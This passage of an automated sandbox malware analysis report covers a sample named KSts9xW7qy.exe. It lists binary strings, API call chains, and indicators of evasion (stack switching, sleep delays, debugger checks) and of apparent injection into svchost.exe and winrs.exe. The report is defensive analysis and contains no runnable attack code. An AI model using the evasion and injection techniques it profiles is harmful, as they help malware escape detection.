winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: KSts9xW7qy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: KSts9xW7qy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: KSts9xW7qy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: KSts9xW7qy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: KSts9xW7qy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8E01E LoadLibraryA,GetProcAddress,0_2_00E8E01E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9C09E push esi; ret 0_2_00E9C0A0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9C187 push edi; ret 0_2_00E9C189
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDC8BC push esi; ret 0_2_00EDC8BE
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E96B05 push ecx; ret 0_2_00E96B18
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBB2B1 push FFFFFF8Bh; iretd 0_2_00EBB2B3
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9BDAA push edi; ret 0_2_00E9BDAC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9BEC3 push esi; ret 0_2_00E9BEC5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004051D0 push es; iretd 1_2_004051D2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A9DB push edx; retf 1_2_0040A9DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403220 push eax; ret 1_2_00403222
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404A20 push esi; retf 1_2_00404A2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404A23 push esi; retf 1_2_00404A2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D376 push ds; ret 1_2_0040D388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415BF3 push esi; retf 1_2_00415BFE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00423413 pushfd ; ret 1_2_00423437
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00406415 push edx; retf 1_2_0040641C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414675 push ebp; retf 1_2_00414688
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040161B push E588A11Fh; iretd 1_2_00401623
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417F6B push ebx; iretd 1_2_00417F71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087CB push es; ret 1_2_004087CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036027FA pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx1_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360283D push eax; iretd 1_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360135F push eax; iretd 1_2_03601369
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0441646B push es; iretd 2_2_0441646D
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0441BC76 push edx; retf 2_2_0441BC77
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0442BC0D push edx; retf 2_2_0442BC0E
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_04415CBB push esi; retf 2_2_04415CC9
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0441E611 push ds; ret 2_2_0441E623
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_04426E8E push esi; retf 2_2_04426E99
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00ED8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00ED8111
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E8EB42
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E9123A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeAPI/Special instruction interceptor: Address: 17CF624
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\winrs.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeEvaded block: after key decisiongraph_0-94636
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeAPI coverage: 5.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\winrs.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\winrs.exe TID: 2200Thread sleep count: 49 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exe TID: 2200Thread sleep time: -98000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe TID: 6676Thread sleep time: -31000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winrs.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EB6CA9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00EB60DD
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00EB63F9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EBEB60
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EBF5FA
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBF56F FindFirstFileW,FindClose,0_2_00EBF56F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1B2F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1C8A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EC1F94
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029CC3A0 FindFirstFileW,FindNextFileW,FindClose,3_2_029CC3A0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E8DDC0
                Source: pTPcvfjkbwUWkD.exe, 00000005.00000002.3520106258.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2071988891.000001A17733C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417543 LdrLoadDll,1_2_00417543
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6AAF BlockInput,0_2_00EC6AAF
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E73D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73D19
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00EA3920
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8E01E LoadLibraryA,GetProcAddress,0_2_00E8E01E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CE270 mov eax, dword ptr fs:[00000030h]0_2_017CE270
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CF8F0 mov eax, dword ptr fs:[00000030h]0_2_017CF8F0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CF890 mov eax, dword ptr fs:[00000030h]0_2_017CF890
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
